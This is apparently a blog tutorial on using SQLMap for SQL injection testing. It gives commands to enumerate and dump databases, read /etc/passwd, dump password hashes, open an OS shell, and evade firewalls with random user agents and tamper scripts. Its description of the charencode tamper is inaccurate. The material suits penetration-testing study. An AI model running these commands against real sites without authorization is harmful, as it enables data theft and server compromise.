SQLMap: A Guide on How to Use This Powerful Tool for Automated SQL Injections

02.09.2024

If you're an ethical hacker passionate about cybersecurity, you've likely used or at least heard of the powerful tool SQLMap. This is a robust tool for performing automated SQL injections. And that's what we're here to discuss today—this incredible tool. If this topic interests you, welcome to this step-by-step guide on how to use SQLMap to conduct your pentests with SQLi attacks.

Without further ado, let's get straight to the point!

Introduction: What's SQLMap

SQLMap is an open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications. First released in 2006, SQLMap quickly became a go-to tool for cybersecurity professionals due to its powerful features and ease of use.

Written in Python, SQLMap is cross-platform, meaning it can run on various operating systems, including Windows, Linux, and macOS. This versatility makes it accessible to a wide range of users, from beginners to seasoned ethical hackers.

SQLMap's capabilities extend beyond just detecting vulnerabilities. It can also exploit them, allowing testers to extract data, modify databases, or even execute commands on the underlying operating system in certain scenarios. Its extensive range of options and automation features make it a vital tool for conducting thorough security assessments, ensuring that web applications are robust against SQL injection attacks.

Understanding SQL and Database Structure

SQL (Structured Query Language) is a standard language used to interact with relational databases. It allows users to perform various operations such as querying data, updating records, and managing database structures.

A relational database is composed of several elements:

  • Database: The top-level container for all data. A database holds multiple tables and is used to store and manage data efficiently.

  • Table: Within a database, tables organize data into rows and columns. Each table is designed to hold a specific type of information, such as user data or product details. Tables are similar to spreadsheets, where each table represents a different entity.

  • Column: Columns define the type of data stored in a table. Each column has a specific data type (e.g., integer, text, date) and a name that represents the kind of information it holds, such as "username" or "price."

  • Row (data): Rows represent individual records within a table. Each row contains data for each column in the table. For example, in a "users" table, a row might contain specific information like a username, email address, and registration date for a single user. In essence, rows hold the actual data entries corresponding to each column in the table.

Part 1: How to install SQLMap

To install SQLMAp, it depends of OS that's u'll use, but generally, you need to install Python first, then download the repository from GitHub, after this you can use the terminal for go to directory of the project downloaded and execute the tool with "python sqlmap.py" or "python sqlmap.py -h".


Now, this article it's for all, but especially for Linux users, and for Linux users we can use apt command to install SQLMap: "sudo apt update && sudo apt install -y sqlmap". For execute the tool, simply type "sqlmap" or "sqlmap -h", and done.

Part 2: Basic Usages of SQLMap

SQLMap offers a range of powerful features to test for and exploit SQL injection vulnerabilities. Here are some basic commands and options to get you started:

  • 1. Basic Command Structure: To perform a basic SQL injection test, use the following syntax:
  • sqlmap -u [URL]
  • 2. Specifying Parameters: If you need to test specific parameters (for POST data), use:
  • sqlmap -u [URL] --data "param1=value1&param2=value2"
  • 3. Enumerating databases: For get the databases, use:
  • sqlmap -u [URL] --dbs
  • 4. Enumeration of Tables: To enumerate tables within a specific database, use:
  • sqlmap -u [URL] -D [database] --tables
  • 5. Enumeration of Columns: To enumerate columns within a specific table, use:
  • sqlmap -u [URL] -D [database] -T [table] --columns
  • 6. Extracting (Dumping) Data: To extract data from a specific table and column (or various columns), use:
  • sqlmap -u [URL] -D [database] -T [table] -C [column (if various, separates with ",")] --dump

Part 3: Special or Additional Usages of SQLMap

SQLMap offers a wide range of advanced features beyond basic SQL injection testing. Here are some special or additional usages that can enhance your testing and exploitation capabilities:

1. Advanced SQL Injection Detection

  • Different Injection Techniques: SQLMap supports various SQL injection techniques. You can specify which technique to use with the --technique parameter. For example, --technique=BEUSQT covers Boolean-based blind, Error-based, Union-based, Stacked queries, and Time-based blind injection techniques. Alternatively, SQLMap can automatically choose the best technique for the situation.

  • Level of Testing: The --level parameter adjusts the depth of the tests performed. For example, --level=2 increases the testing depth compared to the default level, which can help uncover more complex vulnerabilities but may take longer.

  • Custom HTTP Headers: To test with custom HTTP headers, use the --headers parameter. For instance, --headers="X-Custom-Header: value" allows you to include specific headers in your requests.

2. Bypassing WAFs and Filters

  • Randomized User-Agent Strings: The --random-agent parameter randomizes the User-Agent header, which can help bypass web application firewalls (WAFs) and filters. For example, --random-agent uses a different User-Agent string for each request.

  • Proxy Usage: To route SQLMap's traffic through a proxy, use the --proxy parameter. For example, --proxy="https://proxy_ip:port" specifies the proxy server settings.

3. Database Management and OS Command Execution

  • OS Command Execution: If the SQL injection vulnerability allows for command execution, use the --os-shell parameter to access an interactive OS shell on the target server. For example, --os-shell provides a command line interface on the target server.

  • File System Information Retrieval: The --file-read parameter allows you to read files from the server's file system. For instance, --file-read="/etc/passwd" lets you read the contents of the /etc/passwd file on a Unix-like system.

4. User and Privilege Enumeration

  • Enumerate Users and Privileges: Use the --users parameter to enumerate database users and the --passwords parameter to enumerate their passwords. For example, --users retrieves a list of database users.

5. Customizing the Attack

  • Specify Database System: To tailor SQLMap's attack methods to a specific database system, use the --dbms parameter. For example, --dbms=MySQL specifies that the target is a MySQL database.

  • Custom Payloads: The --custom-payload parameter allows you to send a custom SQL payload during the attack. For example, --custom-payload="SELECT * FROM users WHERE id=1" lets you specify a custom SQL query.

These advanced features provide greater control and flexibility when performing penetration tests with SQLMap. For a comprehensive list of options and further details, refer to the SQLMap documentation or use the help command.

6. Tamper Scripts

Tamper scripts are used to modify the payloads SQLMap sends to the server, which can help bypass various security mechanisms like web application firewalls (WAFs) or input validation filters. Here are two common tamper scripts:

  • space2comment: This tamper script replaces spaces in the payload with SQL comments. This technique can help bypass input filters that might block certain types of space usage. For example, it transforms the payload SELECT * FROM users into SELECT/*comment*/ * FROM/*comment*/ users.

  • charencode: This tamper script encodes characters in the payload using hexadecimal or other encodings. This helps evade filters that detect specific SQL keywords or patterns. For example, it transforms the payload SELECT * FROM users into SELECT%20*%20FROM%20users, where %20 represents a space character in URL encoding.

To use tamper scripts, you can specify them with the --tamper parameter. For instance, using both space2comment and charencode scripts together would look like this:

--tamper=space2comment,charencode

Part 4: A Complete Example Command for a Better Attack with SQLMap

Personally, I often use the following command for performing SQL injections with SQLMap. This command is highly customizable for various sites and can be tailored to specific needs:
  • sqlmap -u [URL] --technique=BEUSQT --tamper=space2comment,charencode --level=5 --risk=3 --random-agent --dbs

Explanation of Each Parameter:

  • -u [URL]: Replace [URL] with the target URL containing the SQL injection vulnerability. For example, https://example.com/page.php?id=1

  • --technique=BEUSQT: Specifies the injection techniques to be used. Here, BEUSQT includes Boolean-based blind, Error-based, Union-based, Stacked queries, and Time-based blind techniques.

  • --tamper=space2comment,charencode: Utilizes tamper scripts to modify the payload. space2comment replaces spaces with SQL comments, and charencode encodes characters to bypass filters.

  • --level=5: Sets the level of tests to perform. A higher level means more thorough testing but may increase time and complexity. Level 5 is quite exhaustive.

  • --risk=3: Defines the risk of tests. A higher risk level allows for more intrusive and potentially disruptive tests. Level 3 is the most aggressive.

  • --random-agent: Randomizes the User-Agent header in requests to help bypass web application firewalls (WAFs) and other security measures.

  • --dbs: Lists all databases on the target server, providing an overview of the database structure.

  • --batch: I don't use this option all the time, but if you need to run the attack without manually responding to prompts, this parameter can be helpful. It automatically answers prompts with default options, which is useful when you don't have time to monitor the attack or need to run it unattended.

This command covers a broad range of techniques and configurations to perform a thorough and effective SQL injection test. Adjust parameters as needed based on the specific site and testing requirements.

BONUS

I made a Python Script to automate all that we've seen in this guide.

You can test it here: AutoSQLMap Script

Conclusion

In this guide, we've explored several key aspects of SQLMap, including its installation, basic usage, and advanced features such as tamper scripts and custom configurations. We've seen how to effectively leverage parameters like --technique, --tamper, --level, and --risk to tailor your SQL injection attacks and enhance your security assessments.

However, it's important to note that SQLMap is a complex and versatile tool with many more features and options beyond what we've covered here. The world of SQL injection and automated testing is vast, and SQLMap offers an extensive range of capabilities that are impossible to fully explain in a single article.

There's always more to learn and discover, so I encourage you to delve deeper into SQLMap's documentation, experiment with different features, and stay updated with the latest developments in the field of cybersecurity. By continuing to explore and practice, you'll gain a deeper understanding of SQLMap and its potential, ultimately improving your skills and effectiveness in penetration testing.

Copyright © 2024

Creado con Webnode
¡Crea tu página web gratis! Esta página web fue creada con Webnode. Crea tu propia web gratis hoy mismo! Comenzar